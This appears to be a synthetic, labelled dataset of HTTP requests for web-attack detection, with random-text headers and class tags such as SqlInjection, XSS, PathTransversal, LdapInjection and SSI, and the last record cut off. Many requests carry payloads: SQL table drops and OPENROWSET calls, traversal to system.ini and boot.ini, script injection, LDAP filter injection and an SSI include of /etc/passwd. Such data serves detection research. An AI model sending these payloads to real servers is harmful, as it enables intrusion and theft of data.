GET /a09/tmhlopir8unh/hFX@_W/ht0h8ee3iibiiar5Tu.cfm?sx=%27sr+Lbhanr6&ga7heprtai=9312078153&rn=%27%3B+drop+++table+++admin HTTP/1.1
Host: www.etc8urtnro.uk
Connection: keep-alive
Accept: video/quicktime, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: s8ia6to3-usbi, hponu-q;q=0.2, tviar-d;q=0.9
Cache-Control: aua=thi7whli
Client-ip: 34.227.190.70
Cookie: .ghtaccesloK=024687350
Cookie2: $Version="2"
Date: Tue, 08 May 07 14:47:18 UTC
ETag: "ZSerFm.z9rWfs9@A7MH."
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Fri, 07 Apr 06 17:21:38 GMT
If-Unmodified-Since: Sun, 08 Nov 09 16:46:32 UTC
If-Match: "GkOAUG4fFCndLOMzL"
If-None-Match: *
If-Range: Thu, 12 Oct 06 12:44:22 UTC
Max-Forwards: 57
MIME-Version: 0.6
Pragma: leomi='oihlabna'
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: Basic ZXllaVRoczY6bHNvM2k=
Range: 53-,-2932
Referer: /weiq/RnPz/2wso/9paug/tilaiQ.js
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 0.1; en-sb; rv:6.5.5) Gecko/14800888
UA-CPU: PowerPC
UA-Disp: 257,8628,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 5.1 www.foetac.png, HTTP/6.6 109.95.108.194:0308
Transfer-Encoding: deflate
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 292 www.ev6O.jpeg "hnt5llemsftyrettr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42434
Start - Id: 44961
class: PathTransversal
GET /okjl.Y7Yf6/87Zo4G5.php4?jtfgp=gonnsams7usrtxarwcets&aaonapn=kTP1ML0&insertLwYJperlM=tvoRn4%3F&iom7cai1ia=026483&5Yug=esh&5XbRPUservicesY=urre&xp_LVz7DNeh=eahmiaoo&aetrSbiDemeq=doc%28+++file%3A%2F%2F%2Fc%3A%2FEf%2FEsrgTr.xml+++%29&prPxereplacedV0zK=hkNtvstelpoynnlc&nttMtxsM=uoJ8R6o&snleilti=685395 HTTP/1.0
Host: 234.158.237.58
Connection: close
Accept: video/mpeg;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: re3tp-aO;q=0.5
Cache-Control: eEc='uch'
Client-ip: 108.71.153.69
Cookie: btz=998;ri29itqihAelex=723979;eo=9;Nhr0doaddeseokn=8selreeesetssc
Cookie2: $Version="02"
Date: Tue, 21 Apr 09 22:57:27 CET
ETag: W/"@Ha_U7Oeumx8BwDN1Ut."
Expect: 100-continue
If-Modified-Since: Thu, 29 Sep 05 11:41:28 UTC
If-Unmodified-Since: Thu, 20 Oct 05 10:37:45 CET
If-Match: *
If-None-Match: "sfeSHScfadv2-25T-S"
If-Range: *
Max-Forwards: 5
MIME-Version: 1.3
Pragma: l4hrjfnb=he
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: http://ciznabi.st/aiot.js
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.6 (compatible; MSIE 7.1; Mac OS X; wzoDeo)
UA-CPU: Sparc
UA-Color: color32
UA-Pixels: 298x509
Via: dSS/5.0 184.217.61.230:0321
Transfer-Encoding: deflate
Upgrade: mAelaA/3.4, 5lote/9.4, GsasM/7.6, ho40u/4.6, tead/1.7
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44961
Start - Id: 47350
class: XSS
GET /i2Es5olYhqnnwo/4TCsscriptlObNNSR/eBVKAe/kqdahieo/mnel/7LcR4FqH_zs/rBxwGTLqF4Ac0RwJPc/Uoiat9lnOttorsj0ootn/i_/ITtnF_GF5/BuHj4passwd0ZXhjD/dMvP_5i.css?ylwindow.openOUO@betweensMo=le&dBBcuYiUDq=4ioteC&m4Uw8tnDX=%3Cbody+++onload++%3D%22+++%5Balert+++%28%27dliwoho%27%29%3B%5D++%22%3E&eeadRibi222iwh=oty&Daccess_loghJ4CinS=at%27T59sEusiIx%29H+&oiudeodgerrni=4irfnn%29olhewom%3De&sdTsisu=sbine&x0oviSirRx=5888 HTTP/1.1
Host: 65.235.84.26
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 46.191.21.117
Cookie: neofs5arimtno=lsanybtsjeth;tsemimz=u5Naat]de8ehwfw[;x0F.S=sf(ni[;ijertnqARdxa=eydteNvpotr;ahlne=[wig
Cookie2: $Version="15"
Date: Sat, 07 Jun 08 01:23:39 UTC
ETag: "cwOMmPV5zVHDJa10Qia6"
Expect: 100-continue
From: KhcttS@4dsl.fr
If-Modified-Since: Sat, 02 Sep 06 07:16:06 CET
If-Unmodified-Since: Thu, 04 Oct 07 14:44:48 CET
If-Match: "41N7uVb2xOKs1TsdNMMt"
If-None-Match: "CvDANQ70RMnd-K-C"
If-Range: Tue, 07 Oct 08 11:00:36 CET
Max-Forwards: 838
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM b25hbmVhbWV0ZkFzdWVhc2hyNUZsOWllYWF0bnFFZGFn
Range: -066761,152-
Referer: http://oogelh.net/v6vui/rubqnr/5cnnri7l.cfm
TE: trailers,trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/8.0 (X11; U; Open BSD i586 8.4; rf-ng; rv:5.0.1) Gecko/93176009
UA-CPU: x86
UA-Disp: 699,6656,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 575x5791
Via: emor/0.7 www.Cninesed.jpg, 6.3 www.oroh.shtml, 2.6 98.139.179.165
Transfer-Encoding: gzip
Upgrade: ni4st/4.0, 7issa/1.3
Warning: 211 www.eefi.shtml "h0shftnyr" "Fri, 11 Nov 05 13:58:15 GMT"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47350
Start - Id: 42760
class: SqlInjection
POST /5nnih3qcp2icsehxde/ebaawavairttfitsn/hfLP223rSSuGrI@4Jpo/8rqsiiijmnlnxihllie/Nh9/eDf26iedehjlgjs/edrfacr8VGD/0dxk-htacces-XI_BBB7/mtEhtasauirtb/nmtbcass2eimrnTohETo/hs3rS22d0/f0bm4.aspx? HTTP/1.1
Content-Length: 141
Content-Language: nen7laeT
Content-Encoding: identity
Content-Location: /n4riat/qtwS/tEeu.mp3
Content-MD5: bmVoYWVsc25pdGl0aXRlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Jul 09 15:55:33 CET
Last-Modified: Tue, 21 Jul 09 01:08:50 CET
Host: 209.132.125.186
Connection: ed9lrev
Accept: application/*;q=0.3, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: ttt0Oii-n;q=0.9, thttdr-msnt;q=0.0, etewbh-e4oe;q=0.6, beiT-h;q=0.3
Cache-Control: max-stale
Client-ip: 174.57.120.40
Cookie: eRhzS=695455;eWh3s='     OR 'viioeawg' =    N'    
Cookie2: $Version="823"
Date: Sat, 03 Mar 07 10:23:15 CET
ETag: W/"bgO4TBcw3v9icYmOs"
Expect: 100-continue
From: ehrms74s@essu1ta.fr
If-Modified-Since: Tue, 07 Apr 09 22:31:13 CET
If-Unmodified-Since: Sun, 02 Apr 06 19:11:27 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 26 Dec 07 23:30:33 CET
Max-Forwards: 5639
MIME-Version: 3.6
Pragma: enTl1i='s'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nonce
Referer: /zaIrreht/aEhbace/imet8r13/aAaj.pl
TE: gzip,trailers,gzip;q=0.5
Trailer: Connection
User-Agent: snt0ade (eD7pLRWW)
UA-CPU: Sparc
UA-Disp: 2042,3575,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 885x378
Via: 8.4 148.78.105.44, HTTP/1.2 www.mrZu2t.html
Transfer-Encoding: compress
Upgrade: aiho/8.7, m9e/5.0
Warning: 063 www.twusoE7n.tiff "h0ilrcaegxedeyblh" "Tue, 22 Feb 05 11:38:52 CET"
X-Forwarded-For: 112.9.167.251
X-Serial-Number: 96344333906
----: --------------------------

emez7cuheruSmru=449&0v6a=kMoiwCq1ea&JToZ=y &Seea=sVnj_IW93&eaNe0=aiadfewriM9d&c9pckn=0242&mwo7A=71&lnSle=12mvBVgy76&elbpsulco5=5ebheieieLD9ap

End - Id: 42760
Start - Id: 39007
class: LdapInjection
POST /dCG/i9DE7fQWTIX_.js? HTTP/1.0
Content-Length: 345
Content-Language: G
Content-Encoding: deflate
Content-Location: http://www.ilpsRni.it/ermin/eaaehaa/2tintiie.png
Content-MD5: ZGpMbmloZXJjZm5zZGFhbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Feb 08 09:14:40 UTC
Last-Modified: Tue, 15 Apr 08 10:54:24 UTC
Host: www.rlnfS0Ejj.net
Connection: rdhva7hi
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: )(   |(It=mah2*)
Cache-Control: no-store
Client-ip: 3.3.3.253
Cookie: orsseerl9l4=s
Cookie2: $Version="84"
Date: Wed, 20 Apr 05 19:21:41 UTC
ETag: W/"Pyd87k1Qm0CacE8"
Expect: nsxdstbE
From: aa3e@ldqettoe.de
If-Modified-Since: Wed, 23 Mar 05 02:44:03 UTC
If-Unmodified-Since: Thu, 26 Mar 09 15:02:44 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Jun 06 24:09:34 UTC
Max-Forwards: 32
MIME-Version: 4.7
Pragma: thtO=see4ow00
Proxy-Authorization: otmtua usmc8bf=eaeteEa
Authorization: Basic SHlhZWU6Z2hpcGM4
Referer: /lomrie.mpg
TE: deflate,chunked;q=0.4
Trailer: Expect
User-Agent: Mozilla/2.9 (X11; U; Open BSD i586 8.3; fb-de; rv:4.4.9) Gecko/13403553
UA-CPU: x86
UA-Color: color16
UA-Pixels: 1899x922
Via: FTP/5.5 45.231.83.216, 9.1 44.162.178.114, 5.3 www.r8rri.png:098
Transfer-Encoding: identity
Upgrade: frhiin/3.9
Warning: 579 217.170.61.118 "X8atie" "Sun, 24 Feb 08 05:56:07 CET"
X-Forwarded-For: 137.88.250.0

Kwindow.open3UunionB1niU=iueeynyneioeieaaet&9kMc9drop=456600&iesO=ectiaaTaGiimnoo&hnoaad8oe=ueugdryiaslt47eaod&ll=1345148&kUQinsertD=iaeute&hayiozeiixyk=<rsaayw%usese'hoc ztmp&ive=TmlhWnoods2&stleRmtherbsjnx=aODJ-HjGIG&adesabe6Epht=e?>f;&eegkhHoaotJonei=eintle1WCae6oOgea&6twcri0tRosnt=eelhttp6havingt afyqn;deis&iaa1imeHwruerln=ev

End - Id: 39007
Start - Id: 45347
class: PathTransversal
GET /e.JbE.nsf?W7Q4@J-84=8etrbui&--7fJbetweencEUwhereA=827&irlTewg6=t2isZ&7eadaml=907&age=divil+pRbody&sh=437549 HTTP/1.1
Host: 81.72.9.233
Connection: wae9cR
Accept: application/*, video/*, audio/x-wav
Accept-Encoding: *
Accept-Language: enchu-ae, fR-gej, sripoH-prdswdq, ir6-stcool
Cache-Control: no-cache
Cookie: hsbc=..\..\..\..\..\..\WINDOWS\system.ini;3RMS3uHadminservices8=qxoioprtxianp
Date: Thu, 03 Mar 05 20:23:20 GMT
ETag: W/"y_j_oI8M@77rE6NGh79r"
Expect: kdtgl8
From: rkoldri4@srssprx.be
If-Modified-Since: Thu, 08 Jun 06 08:12:12 GMT
Pragma: lcsp=Vo
Authorization: Basic YThpdWFhZXM6bGFvaGll
Referer: http://nEdaNt.de/1tesmvu/nzlr/j7e13i/bdSfNl/ioU0.dll
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.1 (X11; U; Unix 2.8; n6-ho; rv:9.5.4) Gecko/16182888
UA-OS: Windows 98
Transfer-Encoding: gzip

null

End - Id: 45347
Start - Id: 41350
class: SqlInjection
GET /u8HwzZ/t-8KSOkY5xRBfaTqn_/ttehrm0zthdbuisa/rgy/lFyEjJA4rgBmNOlYPTc/clfGENDXac0Chudc7/qN_oC0pzGu/ls19z-VRQGps/9eEgiw.jpeg?meitgbga7thKdiu=+h HTTP/1.1
Host: www.bomtura.gov
Connection: ESa8eHnh
Accept: image/jpeg, text/html, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: eonhsoS='gon1'
Cookie: Dcsdwsaoy=90075;deiw=82;eklntrMoleiish6=8453780;hvarstylei_cuJ=;    select   *   from  OPENROWSET( 'SQLoledb','uid=rni;pwd=mpmtftir;Network=DBMSSOCN;Address=135.94.59.231,55240;','select     *     from     6hceeee' );lIhdew=illfinclude;GCB.J=oaaoswrtIe9oo
Cookie2: $Version="23"
Date: Fri, 21 May 04 14:48:49 GMT
ETag: W/"Epqq5OA@1ium@A4"
Expect: p0oon
If-Modified-Since: Sun, 29 Aug 04 01:42:31 CET
If-Match: *
If-Range: *
Max-Forwards: 5
Pragma: tarcrWeq=o
Referer: http://lnRw.gov/eEnoofno/t9st.exe
TE: trailers
Trailer: If-Range
User-Agent: fEInnWw http://www.Dh34oq6x.de
UA-OS: Mac OS X
UA-Color: color32
Via: HTTP/4.4 www.dtrelear.tiff
Warning: 634 192.251.11.144 "rnicslj0srfzebar" 
X-Forwarded-For: 13.230.212.206
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 41350
Start - Id: 44751
class: PathTransversal
GET /8d_opt9/eadeho713gelnpno/r-oFOouiWVaqBmx5.dll?0aKNvpU=UPa%3Daebinappe&oysufniq=03&Adtlecf6rO=6491&toSt=collection%28file%3A%2F%2F%2Fc%3A%2Ffi%2F6oaqeoo.xml+++++%29&adzumnyectErLo=731924841&jesodo1e=Iawss&uyMrcemtaowtra=eRhlcheste&d7=nyznn.L&d3kA3Ow=jLdM+m&dsdmiahtfeNb21O=n28iservices&hlletufdcvisg=c%7CoandS1between&stfnxttoqlepes=rn%3Fa+iTeeclocation&ULr05r5rPi=artnode+aEgEfe+e%3Fj6+n%26t HTTP/1.1
Host: www.ga4deLivl.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: oiunxd8o-pdexhe2d;q=0.2, IeeHa-inisecgw;q=0.1, uwehazi-it2tfDV;q=0.2
Cache-Control: d5ei='q0r1'
Client-ip: 45.186.49.209
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="764"
Date: Wed, 02 Feb 05 09:20:18 UTC
ETag: W/"_s_-6ymUvDHzSviQms"
Expect: 100-continue
From: rairnenr@fiohetan.org
If-Modified-Since: Sun, 29 May 05 14:18:10 CET
If-Unmodified-Since: Fri, 13 Nov 09 11:51:37 CET
If-Match: "jFtRGkiMPnI_tipGq"
If-None-Match: "cudzF9XtPtMq-WUVQ"
If-Range: Fri, 16 Dec 05 19:31:06 CET
Max-Forwards: 412
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://www.crorh5j.de/hsdToon/cmbhjk.php4
Range: 027680-5,4627-
Referer: http://www.dhatc.com/rscdtmt/so1n/eeASe/Geps03/Mmrocno.bin
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: MreAo0oedoSq
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: 6.4 212.103.232.30, fir/7.4 www.8nyllt7r.png, 9.4 www.eocwyseg.shtml
Transfer-Encoding: cdeup1
Upgrade: Qya/6.2
Warning: 079 www.n1cn.tiff "meawmehgeEqekttk" "Tue, 06 Jul 04 17:24:32 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 07923355
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44751
Start - Id: 38510
class: LdapInjection
GET /bbRN97sp/veecetsehfe/rmanTtliAaeh/oiicfunz7otnyzigr2D/emem.asmx?eiedSuiMe=71491228&yi=scmdfg9aqldsentpv&SQ_EZULgU-=xhuid09i4lym0&Tftte0nm4eiho=0&d4ncUteeOcat=10013452&ggwe6hdinoinlh=on&onsyietw=oWa%29%28++++%7C+%28etg%3D*%29&MMIo=879375&coouaPlaLxd0thi=s&RechoWPyXlibNLJd=h6uTJHi&aen4=%27CT HTTP/1.1
Host: www.iiaa3.st
Connection: close
Accept: application/*, audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: 88=an5s6
Client-ip: 83.3.20.105
Cookie: engl5sxa=cdnoOtelnetllswindow.openhu
Cookie2: $Version="388"
Date: Thu, 10 Jul 08 22:41:14 UTC
ETag: "qcoSX53foSbz95-5"
Expect: 100-continue
From: ufiseea@gios.org
If-Modified-Since: Wed, 19 Aug 09 05:08:10 CET
If-Unmodified-Since: Fri, 20 Feb 09 11:23:30 CET
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "4pDd-_01lkxR3kHvu1"
If-Range: "qN9HSGace9QIzq7r08zz"
Max-Forwards: 087
MIME-Version: 3.3
Pragma: demoo='iebdo'
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM U2xkYXBicmQ2bmFDbXJzdGxlZXQxNmllck9SNmM0aWRsb2h2eHI0dWV0
Range: -087,245-62681,-648438
Referer: http://www.iacOw.it/eeneCna/hreS/hril/Lidon.wmn
TE: deflate;q=0.4
Trailer: Warning
User-Agent: o1vBkh http://www.emp3mag.gov
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9397x4761
Via: HTTP/0.1 www.xuhe.jpg
Transfer-Encoding: wh4ba; 5hvata=d6Yrorfa
Upgrade: liDg/6.9, m3r2/7.5
Warning: 474 3.199.185.32 "psgyu2iuh9p6t" "Wed, 30 Jul 08 06:32:37 UTC"
X-Forwarded-For: 172.88.16.189
X-Serial-Number: 30599
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38510
Start - Id: 45803
class: PathTransversal
GET /mlq7219XIWdUpEgczfCS/CKUA_catnOqall/ak_MAmZYEeS.u1.aspx?snu=onie8dsfsltEdf&mnPco0=7678229&iddreieawhtholc=seiW5p&dcgc3s=hoetes7wxrTginar&0awTtidcbinTRv=itt++%3Fee%7Egjmplibvmmeperl&dti=hTrPpa2euI&ictoelei=601625&znrcaEe0=348&ldi=sSV7&ctnyte=qxdeeVxSoJOd&Terd=Vos%3Dservicese6anaywinntwge&zJmozcrcp=oTe4dsasi1wh&d2oia5=e%3A%5Cwindows%5Cboot.ini HTTP/1.1
Host: 252.176.31.115
Connection: close
Accept: application/x-tar, text/html;q=0.2, application/*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 89.136.143.100
Cookie: unet=:h&[yeaas;ino0loieeiT4t6n=a4n9oyOfnmeaEtorii;eafie=tmp;fplhTErr=eE@j182F5;AjrieteLohjodt=S|i;noftawtv0Al=0511
Cookie2: $Version="085"
Date: Mon, 26 Nov 07 21:23:16 CET
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: mzkc3t@iIdwe.ch
If-Modified-Since: Tue, 22 Nov 05 12:29:35 CET
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: "lN4y2yoNZjxbveeM5G"
If-None-Match: *
If-Range: Sun, 14 Jan 07 15:57:04 CET
Max-Forwards: 497
MIME-Version: 2.9
Pragma: da='e'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Digest qop=bEneli
Range: 151606-
Referer: /elii/riehr/ileouo.swf
TE: trailers,chunked,chunked
Trailer: Accept-Language
User-Agent: Mozilla/8.0 (Machintosh; U; Mac OS X 6.2; h9-rs; rv:8.3.5) Gecko/11321163
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9422x259
Via: 3.7 25.113.168.162, FTP/7.2 148.228.246.44
Transfer-Encoding: tiOrc
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 157.18.224.28
X-Serial-Number: 97437776345
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45803
Start - Id: 38359
class: LdapInjection
GET /rfsmlhsq/ztOteoieoi/ryEselim1lgtah/0TOlh0nng/eKYuWzXL3DvVf/azTkvbtemztbDOSk.php?e1iiebEhcie=%29++%28++%7C%28displayName%3Dhad*%29+++%28name++%3D++had*++++%29%28+mail%3Dhad*++%29&K@lqTA.1xs=ejWvO&tera8s9dftz=924176636 HTTP/1.0
Host: www.Mstpioedma.it
Connection: uhtaeo0
Accept: application/*
Accept-Charset: *
Accept-Encoding: compress;q=0.6, gzip;q=0.3, compress;q=0.6
Accept-Language: ipbaae-t5o;q=0.9, oeRbe-hmdyeet;q=0.4, ceT-T;q=0.7, on-te, m9tz-dh3il3by
Cache-Control: max-stale
Client-ip: 193.201.183.61
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="099"
Date: Fri, 29 Apr 05 17:05:18 GMT
ETag: W/"5LoC-V6hl1TUEpQHFV"
Expect: 100-continue
From: 8hntrge@aiwetonej.uk
If-Modified-Since: Tue, 18 Aug 09 02:15:53 UTC
If-Unmodified-Since: Mon, 26 Apr 04 09:33:28 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Nov 09 13:30:11 CET
Max-Forwards: 2
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="epfYqHet"
Authorization: lrietr canR=dtga
Range: 84-89,256260-35,5-
Referer: /bssduoNO.js
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.5 (compatible; MSIE 4.3; Open BSD i586; txkhk; praib9ai)
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 231x314
Via: 7.2 115.92.196.7:1, 6.5 www.earnczr4.html
Transfer-Encoding: compress
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38359
Start - Id: 39533
class: SSI
GET /sz1G-Ywk3EWTOWFf/iDJNOqKP4iyPKODFr/oX_W.n.kvV/pc5b6snlaitjc/jMGZS3SZxuh9Iqi3Bj/omb/gdBVPux.html?oP=tltr%24&9as21=muh&talmeepdpamkgmn=33.T%40oCFm&tt3o7ytleA=dWy2Rln.E HTTP/1.1
Host: www.iqsneenee.net
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: o-nerm, 5ti-atontc;q=0.2, m5malhrn-y2t;q=0.1
Cache-Control: max-stale=7012
Client-ip: 69.236.168.13
Cookie: tceapafwommtYdY=0k2fsOSoantl2ok;mlaenectbdykoOl=<!--#include    virtual="/etc/passwd"  -->;4awess=lgirwi;icNnhf=onm9anMl5r1raoeaah;cidrhrTortgsdz=rg;erd=a)y5dnhftp
Cookie2: $Version="865"
Date: Tue, 10 Jun 08 23:05:50 UTC
ETag: W/"4.eIMH-URnAWUU1F"
Expect: 100-continue
If-Modified-Since: Wed, 13 Dec 06 12:13:15 CET
If-Unmodified-Since: Thu, 20 Aug 09 22:12:47 GMT
If-Match: *
If-None-Match: "ozPdt.z__e3R-ziC"
Pragma: pn=5
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM ZXJ0bjNFaDJhZGFzdjRjcG9wbEFzbm90UEV0ZW9kd3g4dWdkdXBCdHVuY3RrdG8=
Referer: http://eoaeIspe.fr/dtps4ce/faCehfe/mhielw/neflN4/ogAatu.conf
TE: gzip;q=0.5
User-Agent: tnrvj0
UA-CPU: StrongARM
UA-Pixels: 826x503
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 39533
Start - Id: 35260
class: SqlInjection
GET /zG/orodih/Iv-mw@AUuhF5/baesobne/581cfM8Z@CZjcf8rR4/478/ogI.exe?sie4t=%27select++++customer_phone+++++%27%7C%7C%27from+++customers++%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27++++and+++++customer_type%3D1%27%3B&mtslvooa5n60a=imBvJ3L0EXD&wtisdlslTuwl4u=pp%25n%3B&dsreRthgn=lnlpusr%27t%28%27%3F0lie&oetcDes=wtEg HTTP/1.1
Host: www.ouailaRt.gov
Connection: tmieOmbe
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, identity, deflate
Accept-Language: ryutg-hsee, fsnsBsqs-mca
Cache-Control: only-if-cached
Client-ip: 149.160.7.148
Cookie: Srdeioh=s%
Cookie2: $Version="73"
Date: Wed, 31 Aug 05 15:07:01 UTC
ETag: W/"NBtBFUHwyb@U6oz"
Expect: er37ac=rtaefe;celo
From: ieogO97c@1xtO.uk
If-Modified-Since: Wed, 07 Sep 05 04:20:40 UTC
If-Unmodified-Since: Mon, 26 Oct 09 18:15:16 CET
If-Match: *
If-None-Match: "b5Iin6Q.3RF3p.tS1"
If-Range: *
Max-Forwards: 403
MIME-Version: 3.3
Pragma: pHeo=soisHll
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: sdteoe 7etvnrw=eha2
Range: 716-,83323-
Referer: /eomm/o4ra/ogist.jsp
TE: chunked
Trailer: User-Agent
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 7.5; sS-w6; rv:8.2.9) Gecko/06069521
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7179x0700
Via: wage9l/2.5 3.65.189.140, HTTP/8.9 www.iiaehtia.js, HTTP/0.7 180.7.214.179
Transfer-Encoding: gzip
Upgrade: I8j/1.5, gc9ecr/7.1
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 3908709
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35260
Start - Id: 40836
class: SSI
GET /ljI.shtml?.zoKiOeval=53&m0o=%3C%21--++++%23odbc+++++connect%3D%22am%2Cishr%2Cilio%22++++statement%3D%22select++*+from++++eioo3%22--%3E&8CA0WvKsselectX=oOR&5Aaua=t%3F HTTP/1.1
Host: 24.92.53.200
Connection: close
Accept: image/gif, image/*
Accept-Charset: us-ascii;q=0.7, x-mac-turkish, utf-8, x-mac-greek;q=0.6
Accept-Encoding: identity;q=0.9, identity, identity;q=0.7, gzip
Accept-Language: *;q=0.1
Cache-Control: min-fresh=33
Client-ip: 246.243.47.248
Cookie: 933ootIwmWieyi=cS-1DqJ;dti=4171181
Cookie2: $Version="353"
Date: Thu, 28 Jun 07 05:48:05 GMT
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: 100-continue
From: heeo2q@daRia.de
If-Modified-Since: Mon, 21 Jan 08 14:08:28 GMT
If-Unmodified-Since: Fri, 13 Feb 09 14:30:37 CET
If-Match: "DpqEPJY69EzDi3y"
If-None-Match: "J_Cz5lDOCxj4AEqV"
If-Range: Fri, 29 Feb 08 23:23:47 GMT
Max-Forwards: 262
MIME-Version: 0.3
Pragma: luTs=lmlfm
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Basic aXNyb3Q6aXRvQ2lh
Range: 4-703669
Referer: http://bqzeoPit.net/ohan1u/ilsa/vhdnnN7.cgi
TE: trailers
Trailer: Transfer-Encoding
User-Agent: mC-tCtyk http://www.mtdYda.cz
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 266x239
Via: FTP/2.2 164.251.101.92, HTTP/3.4 246.153.35.173, FTP/0.5 www.edattOt.png
Transfer-Encoding: gzip
Upgrade: aBsae/7.5, Ars/0.8, 2ba7f/1.4, ikeqi/5.4
Warning: 943 www.nneettw.tiff "el9tus" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 546087958111322
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40836
Start - Id: 40251
class: SSI
PUT /eodnmRht.exe? HTTP/1.0
Content-Length: 296
Content-Language: yo1l,emttreph
Content-Encoding: identity
Content-Location: /eoRoO/eshkpaj.png
Content-MD5: SXphc2x1ZWVhaGhsanMydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Oct 09 18:06:11 GMT
